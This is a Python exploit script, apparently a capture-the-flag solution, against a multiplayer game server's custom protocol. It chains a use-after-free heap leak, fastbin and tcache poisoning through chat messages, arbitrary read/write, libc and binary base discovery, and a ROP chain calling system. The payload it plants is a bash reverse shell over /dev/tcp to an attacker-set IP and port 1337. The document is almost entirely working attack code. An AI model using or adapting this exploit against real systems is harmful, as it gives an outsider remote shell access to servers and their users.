from my_protocol import *
import threading
import time
import struct
import sys

RSHELL_IP = ""
RSHELL_PORT = 1337

def heartbeat_thread(token):
    while 1:
        heartbeat(token)
        time.sleep(5)

players = {}
map_state = None
last_auth = None
def update_thread():
    global players, map_state, last_auth

    while 1:
        cmd, body = recv_pdu()
        if cmd == protocol.Cmd.SERVER_PLAYER_INFO_PDU:
            players[body.name.rstrip(b"\0")] = body
        elif cmd == protocol.Cmd.MAP_STATE_PDU:
            map_state = body
        elif cmd == protocol.Cmd.SERVER_ATTACK_PDU:
            pass
        elif cmd == protocol.Cmd.AUTHENTICATION_RESPONSE_PDU:
            last_auth = body
        else:
            print(cmd, body)

def get_victim():
    return players.get(b"mafioso-dev", None)

def get_greenshard():
    try:
        return next(obj for obj in map_state.objects if obj.object_type == protocol.ObjectType.Greenshard)
    except StopIteration:
        return None

def is_left_of(a_map, a_x, b_map, b_x):
    """ Is object a to the left of object b? """
    if a_map == b_map:
        return a_x < b_x
    # Map ordering: 2 (red), 1 (main), 0 (right)
    return a_map > b_map

def push_victim_until(token, move_right, cond):
    print("pushing", "right" if move_right else "left", end=".")

    while 1:
        victim = get_victim()
        if cond():
            break
        if move_right:
            x = victim.x - 16
        else:
            x = victim.x + 16
        client_player_info(token, map_id=victim.map_id, x=x, y=victim.y, facing=[protocol.FacingDirection.Left, protocol.FacingDirection.Right][move_right], name=b"x")
        client_attack(token, victim_player_id=victim.player_id, attack_damage=0)
        print(".", end="")
        sys.stdout.flush()
        time.sleep(0.1)

    print()

def damage_victim(token, qty):
    client_attack(token, victim_player_id=get_victim().player_id, attack_damage=qty & ((1 << 64) - 1))

if __name__ == "__main__":
    resp = authenticate(b"z" * 14 + b"\x55")
    threading.Thread(target=heartbeat_thread, args=(resp.token,), daemon=True).start()
    threading.Thread(target=update_thread, daemon=True).start()
    while 1:
        if map_state is None or not get_victim() or not get_greenshard():
            time.sleep(0.1)
            continue

        break

    import atexit
    atexit.register(lambda: client_disconnect(resp.token))

    victim = get_victim()
    greenshard = get_greenshard()
    print(greenshard)
    move_right = is_left_of(victim.map_id, victim.x, greenshard.map_id, greenshard.pos_x * 32)
    push_victim_until(resp.token, move_right, lambda: get_greenshard() is None)

    # Wait for new greenshard to spawn so it doesn't steal our allocation
    print("waiting for new shard to spawn")
    while not get_greenshard():
        time.sleep(0.1)

    # Push the victim onto another map to trigger free
    victim = get_victim()
    initial_map_id = victim.map_id
    move_right = victim.map_id > 0
    push_victim_until(resp.token, move_right, lambda: get_victim().map_id != initial_map_id)

    leak = get_victim().greenshard_hp
    heapbase = leak << 12
    print("Heap base:", hex(heapbase))

    # This allocation occurs at +0xe10
    payload = b"a" * 0x88 + struct.pack("<QQ", 0x35, (heapbase >> 12) ^ (heapbase + 0xed0 + 0x80))
    payload = payload.ljust(0xb7, b"\xcc")
    chat(resp.token, payload)

    # Second allocation at +0xed0
    payload = b"a" * 0x88 + struct.pack("<QQ", 0x35, heapbase >> 12)
    payload = payload.ljust(0xb7, b"\xcc")
    chat(resp.token, payload)

    # We now control the fd of a fastbin chunk
    damage_victim(resp.token, leak - (leak ^ (heapbase + 0xe10 + 0x80)))

    # Trigger allocation from fastbin and transfer to tcache
    chat(resp.token, b"x" * 31)
    chat(resp.token, b"x" * 31)
    chat(resp.token, b"x" * 31)

    # Let everything get freed
    print("waiting for chats to expire")
    time.sleep(7)

    # Allocate two real users using the 0xc0 bucket, overwrite their shields to point into the local_player structure
    # => ed0
    last_auth = None
    authenticate(b"a" * 14 + b"\x55", wait_for_response=False)
    while last_auth is None:
        time.sleep(0.1)
    resp2 = last_auth

    # => ea0, release back to pool
    time.sleep(0.5)
    chat(resp.token, b"\x00" * 0x18 + struct.pack("<Q", heapbase + 0xb70 + 0x70)[:7])
    time.sleep(3)
    # => f60
    chat(resp.token, b"\x00" * 0x18 + struct.pack("<Q", heapbase + 0xb70 + 0x70)[:7])
    time.sleep(2.5)

    # => e10
    last_auth = None
    authenticate(b"b" * 14 + b"\x55", wait_for_response=False)
    while last_auth is None:
        time.sleep(0.1)
    resp3 = last_auth

    # => ea0 again
    chat(resp.token, b"\x00" * 0x18 + struct.pack("<Q", heapbase + 0xb70 + 0x70)[:7])

    # disconnect 2x with shield set to local_player+0x70, in the hopes that we can decrement attacked down to 0
    # and thereby free local_player+0x70
    time.sleep(0.5)
    damage_victim(resp2.token, 1)
    client_disconnect(resp2.token)
    client_disconnect(resp3.token)
    time.sleep(0.5)

    # recreate these so that freeing works
    payload = b"a" * 0x88 + struct.pack("<QQ", 0x35, heapbase >> 12)
    payload = payload.ljust(0xb7, b"\xcc")
    chat(resp.token, payload)

    payload = b"a" * 0x88 + struct.pack("<QQ", 0x35, heapbase >> 12)
    payload = payload.ljust(0xb7, b"\xcc")
    chat(resp.token, payload)

    time.sleep(5)

    # If we're lucky, we now have 8b arb read/write!
    def read_u64(addr):
        payload = struct.pack("<QIIQIIQIIQQ", 5, 0, 0,  0, 0, 0,  0, 0, 0,  1, addr)
        chat(resp.token, payload[:63])
        time.sleep(0.5)
        res = get_victim().greenshard_hp
        # for chat to expire
        time.sleep(5)
        return res

    def write_u64(addr, val):
        payload = struct.pack("<QIIQIIQIIQQ", 5, 0, 0,  0, 0, 0,  0, 0, 0,  1, addr)
        chat(resp.token, payload[:63])
        time.sleep(0.5)
        res = get_victim().greenshard_hp
        damage_victim(resp.token, res - val)
        # for chat to expire
        time.sleep(5)

    # sanity check
    if read_u64(heapbase) != heapbase + 0x30:
        raise Exception("sorry, it didn't work")

    # Arena walking
    arena = heapbase + 0x30
    while 1:
        arena = read_u64(arena + 0x870)
        print("next arena:", hex(arena))
        if (arena & 0xfff) != 0x30:
            # found libc
            break

    libc_base = arena - 0x21ac80
    print("libc base:", hex(libc_base))

    environ = read_u64(libc_base + 0x222200)
    print("environ:", hex(environ))

    exe_addr = read_u64(environ - 0x1e0)
    exe_base = exe_addr - 0x2b2b
    print("exe base:", hex(exe_base))

    # -0x290 offset to stack when snprintf_chk is called in `network_send_client_player_info`
    # +0xd8 offset from gadget
    rop_start = environ - 0x290 + 0xd8
    gadget = libc_base + 0x00082ec8 # add rsp, 0x00000000000000D8 ; ret
    cave = exe_base + 0x2cc00 # just a convenient writable address

    rop = [
        libc_base + 0x0007ac9d, # pop rdi ; ret
        cave,
        libc_base + 0x50d70, # system
    ]

    for i in range(len(rop)):
        write_u64(rop_start + 8 * i, rop[i])

    cmd = f"bash -c 'bash -i >& /dev/tcp/{RSHELL_IP}/{RSHELL_PORT} 0>&1'\0".encode()
    while len(cmd) % 8:
        cmd += b"\0"

    for i in range(0, len(cmd), 8):
        write_u64(cave + i, struct.unpack("<Q", cmd[i:i+8])[0])

    # overwrite sprintf_chk function pointer
    write_u64(exe_base + 0x2cb28, gadget)
